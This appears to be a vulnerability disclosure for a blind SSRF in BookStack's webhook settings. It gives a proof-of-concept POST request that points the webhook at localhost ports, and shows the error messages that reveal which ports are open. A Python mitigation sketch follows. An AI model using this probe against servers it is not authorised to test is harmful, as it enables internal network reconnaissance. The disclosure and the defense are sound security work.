The webhook function can be used to reach the local environment of the server.
Because the result is only visible through the returned message, this is a blind SSRF, and it makes it possible to perform a port scan against the local environment.
After logging in, open the webhook settings page, set the endpoint URL to one of the following patterns, and confirm from the difference between the returned messages that the local environment is reachable.
Open port:
http://localhost:80
Closed port:
http://localhost:1234
POST /settings/webhooks/create HTTP/2
Host: demo.bookstackapp.com
...
_token=6AoIWKtSMXumoIqe2YyXsDREcraLVqwaIjf8VEV0&active=true&name=a&endpoint=http%3A%2F%2Flocalhost%3A1234%2F&timeout=20&events%5B%5D=all
Message returned for an open port:
Response status from endpoint was 405
Message returned for a closed port:
cURL error 7: Failed to connect to localhost port 1234 after 0 ms: Connection refused (see https://curl.haxx.se/libcurl/c/libcurl-errors.html) for http://localhost:1234/
https://drive.google.com/file/d/1SM3HwCulnW_09L8FYo6V4wWc4tx95rYC/view?usp=drive_link
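
The two messages above differ, and that difference is what turns the webhook into a port-state oracle. The following is an added mitigation sketch, not BookStack's code: it rejects endpoints that resolve to non-public addresses and collapses every delivery failure into one message. The function names, the message wording and the injectable resolver are assumptions made for this example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

GENERIC_FAILURE = "Webhook delivery failed"  # constructed wording


def resolve_host(host, port):
    """Default resolver: every address the host name maps to."""
    infos = socket.getaddrinfo(host, port, proto=socket.IPPROTO_TCP)
    return [info[4][0] for info in infos]


def endpoint_allowed(url, resolver=resolve_host):
    """True only if the URL is http(s) and every resolved address is public."""
    try:
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            return False
        port = parts.port or (443 if parts.scheme == "https" else 80)
        addresses = resolver(parts.hostname, port)
        if not addresses:
            return False
        for addr in addresses:
            ip = ipaddress.ip_address(addr.split("%")[0])  # drop IPv6 zone id
            # Judge IPv4-mapped IPv6 (::ffff:127.0.0.1) by its IPv4 address.
            ip = getattr(ip, "ipv4_mapped", None) or ip
            if not ip.is_global:  # loopback, private, link-local, reserved
                return False
    except (OSError, ValueError):  # bad URL, bad port, resolution failure
        return False
    return True


def user_message(status_code=None, transport_error=None):
    """Message shown to the user; failure detail goes to the server log only."""
    ok = transport_error is None and status_code is not None
    if ok and 200 <= status_code < 300:
        return "Webhook delivered"
    return GENERIC_FAILURE
```

The address check only holds if the HTTP client then connects to the addresses that were validated and does not follow redirects to hosts that were not checked.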